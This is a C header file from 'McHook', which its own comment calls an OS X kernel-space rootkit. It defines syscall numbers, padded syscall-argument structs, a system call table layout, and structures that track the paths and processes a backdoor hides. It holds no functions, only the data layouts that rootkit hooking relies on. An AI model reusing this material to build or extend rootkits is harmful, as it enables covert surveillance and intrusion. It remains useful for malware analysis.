/* * McHook - structures.h * OS X KSpace Rootkit * * Created by revenge on 20/03/2009 * Copyright (C) HT srl 2009. All rights reserved * */ #if __LP64__ || NS_BUILD_32_LIKE_64 typedef int64_t NSInteger; typedef uint64_t NSUInteger; #else typedef int32_t NSInteger; typedef uint32_t NSUInteger; #endif #define PAD_(t) (sizeof(uint64_t) <= sizeof(t) \ ? 0 : sizeof(uint64_t) - sizeof(t)) #if BYTE_ORDER == LITTLE_ENDIAN #define PADL_(t) 0 #define PADR_(t) PAD_(t) #else #define PADL_(t) PAD_(t) #define PADR_(t) 0 #endif // BSD syscall(s) #define SYS_syscall 0 #define SYS_exit 1 #define SYS_fork 2 #define SYS_read 3 #define SYS_wait4 7 #define SYS_setuid 23 #define SYS_ptrace 26 #define SYS_kill 37 #define SYS_reboot 55 #define SYS_shutdown 134 #define SYS_getdirentries 196 #define SYS_getattrlist 220 #define SYS_getdirentriesattr 222 #define SYS_getdirentries64 344 // Mach-trap(s) #define TRAP_tfp 45 #define MAX_PATH_ENTRIES 15 #define MAX_BACKDOOR_ENTRIES 15 #define MAX_USER_SIZE 20 #define MAX_DIRNAME_SIZE 30 typedef struct exclusion_list { char processname[20]; int is_active; } exclusion_list_t; // // Per-Backdoor+Username (per-pid) data struct holding all the paths that the backdoor // needs to hide, filled in through ioctl requests // typedef struct reg_backdoors { char path[MAX_PATH_ENTRIES][MAX_DIRNAME_SIZE]; char username[MAX_USER_SIZE]; int path_counter; int is_active; int is_hidden; int is_task_hidden; int is_proc_hidden; proc_t p; } reg_backdoors_t; typedef struct symbol_32 { uint32_t hash; uint32_t address; } symbol32_t; typedef struct symbol_64 { uint64_t hash; uint64_t address; } symbol64_t; typedef struct os_version { uint32_t major; uint32_t minor; uint32_t bugfix; } os_version_t; typedef struct attribute_buffer { uint32_t length; attrreference_t name; } attribute_buffer_t; struct FInfoAttrBuf { unsigned long length; attrreference_t name; fsobj_type_t objType; char finderInfo[32]; }; typedef struct FInfoAttrBuf FInfoAttrBuf; typedef struct attr_list { u_short bitmapcount; // number of attr. bit sets in list (should be 5) u_int16_t reserved; // (to maintain 4-byte alignment) u_int32_t commonattr; // common attribute group u_int32_t volattr; // Volume attribute group u_int32_t dirattr; // directory attribute group u_int32_t fileattr; // file attribute group u_int32_t forkattr; // fork attribute group } attr_list_t; struct mk_read_args { char fd_l_[PADL_(int)]; int fd; char fd_r_[PADR_(int)]; char cbuf_l_[PADL_(user_addr_t)]; user_addr_t cbuf; char cbuf_r_[PADR_(user_addr_t)]; char nbyte_l_[PADL_(user_size_t)]; user_size_t nbyte; char nbyte_r_[PADR_(user_size_t)]; }; struct mk_getdirentries_args { char fd_l_[PADL_(int)]; int fd; char fd_r_[PADR_(int)]; char buf_l_[PADL_(user_addr_t)]; user_addr_t buf; char buf_r_[PADR_(user_addr_t)]; char count_l_[PADL_(u_int)]; u_int count; char count_r_[PADR_(u_int)]; char basep_l_[PADL_(user_addr_t)]; user_addr_t basep; char basep_r_[PADR_(user_addr_t)]; }; struct mk_getdirentries64_args { char fd_l_[PADL_(int)]; int fd; char fd_r_[PADR_(int)]; char buf_l_[PADL_(user_addr_t)]; user_addr_t buf; char buf_r_[PADR_(user_addr_t)]; char bufsize_l_[PADL_(user_size_t)]; user_size_t bufsize; char bufsize_r_[PADR_(user_size_t)]; char position_l_[PADL_(user_addr_t)]; user_addr_t position; char position_r_[PADR_(user_addr_t)]; }; //#if (defined(MAC_OS_X_VERSION_10_7) && MAC_OS_X_VERSION_MAX_ALLOWED >= MAC_OS_X_VERSION_10_7) //struct mk_getdirentriesattr_args { //int fd; //struct attrlist *alist; //void *buffer; //size_t buffersize; //u_long *count; //u_long *basep; //u_long *newstate; //u_long options; //}; //#else struct mk_getdirentriesattr_args { char fd_l_[PADL_(int)]; int fd; char fd_r_[PADR_(int)]; char alist_l_[PADL_(user_addr_t)]; user_addr_t alist; char alist_r_[PADR_(user_addr_t)]; char buffer_l_[PADL_(user_addr_t)]; user_addr_t buffer; char buffer_r_[PADR_(user_addr_t)]; char buffersize_l_[PADL_(user_size_t)]; user_size_t buffersize; char buffersize_r_[PADR_(user_size_t)]; char count_l_[PADL_(user_addr_t)]; user_addr_t count; char count_r_[PADR_(user_addr_t)]; char basep_l_[PADL_(user_addr_t)]; user_addr_t basep; char basep_r_[PADR_(user_addr_t)]; char newstate_l_[PADL_(user_addr_t)]; user_addr_t newstate; char newstate_r_[PADR_(user_addr_t)]; char options_l_[PADL_(user_ulong_t)]; user_ulong_t options; char options_r_[PADR_(user_ulong_t)]; }; //#endif struct mk_getattrlist_args { char path_l_[PADL_(user_addr_t)]; user_addr_t path; char path_r_[PADR_(user_addr_t)]; char alist_l_[PADL_(user_addr_t)]; user_addr_t alist; char alist_r_[PADR_(user_addr_t)]; char attributeBuffer_l_[PADL_(user_addr_t)]; user_addr_t attributeBuffer; char attributeBuffer_r_[PADR_(user_addr_t)]; char bufferSize_l_[PADL_(user_size_t)]; user_size_t bufferSize; char bufferSize_r_[PADR_(user_size_t)]; char options_l_[PADL_(user_ulong_t)]; user_ulong_t options; char options_r_[PADR_(user_ulong_t)]; }; struct mk_kill_args { char pid_l_[PADL_(int)]; int pid; char pid_r_[PADR_(int)]; char signum_l_[PADL_(int)]; int signum; char signum_r_[PADR_(int)]; char posix_l_[PADL_(int)]; int posix; char posix_r_[PADR_(int)]; }; typedef int32_t sy_call_t (struct proc *, void *, int *); typedef void sy_munge_t (const void *, void *); // system call table struct sysent { int16_t sy_narg; // number of args int8_t sy_resv; // reserved int8_t sy_flags; // flags sy_call_t *sy_call; // implementing function sy_munge_t *sy_arg_munge32; // system call arguments munger for 32-bit process sy_munge_t *sy_arg_munge64; // system call arguments munger for 64-bit process int32_t sy_return_type; // system call return types uint16_t sy_arg_bytes; // Total size of arguments in bytes for // 32-bit system calls }; .